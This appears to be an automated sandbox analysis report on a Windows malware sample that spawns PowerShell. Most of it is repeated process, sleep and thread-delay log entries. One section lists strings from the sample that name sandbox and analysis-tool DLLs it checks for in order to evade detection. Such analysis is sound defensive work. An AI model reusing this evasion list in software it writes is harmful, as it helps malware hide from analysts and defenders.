Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeBinary or memory string: DIR_WATCH.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeBinary or memory string: SBIEDLL.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeBinary or memory string: API_LOG.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.drBinary or memory string: EABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HS%S%SDELAYS.TMPWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION8
Source: C:\Users\user\Desktop\YYjRtxS70h.exeMemory allocated: 2790000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeMemory allocated: 2790000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeWindow / User API: threadDelayed 775Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeWindow / User API: threadDelayed 9067Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1068Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 458Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7498Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2182Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1553Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6815Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2907Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1346Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 615Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7908Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1753Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -29514790517935264s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -99812s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -99687s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -99578s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -99469s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -99359s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -99249s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -99140s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -99031s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -98922s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -98812s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -98703s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -98593s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -98484s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -98375s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -98265s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -98155s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -98047s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -97937s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -97828s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -97719s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -97609s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -97497s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -97390s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -97281s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -97172s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -97062s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -96953s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -96844s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -96719s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -96609s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -96500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -96390s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -96281s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -96172s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -96062s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -95953s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -95844s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -95719s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -95609s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -95500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -95390s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -95281s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -95172s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -95062s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -94953s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -94843s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -94734s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -94624s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124Thread sleep time: -94515s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 1068 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3364Thread sleep count: 42 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4832Thread sleep count: 458 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep count: 7498 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116Thread sleep count: 2182 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5296Thread sleep count: 1553 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940Thread sleep count: 265 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 828Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3500Thread sleep count: 6815 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3836Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4820Thread sleep count: 2907 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012Thread sleep count: 1346 > 30Jump to behavior
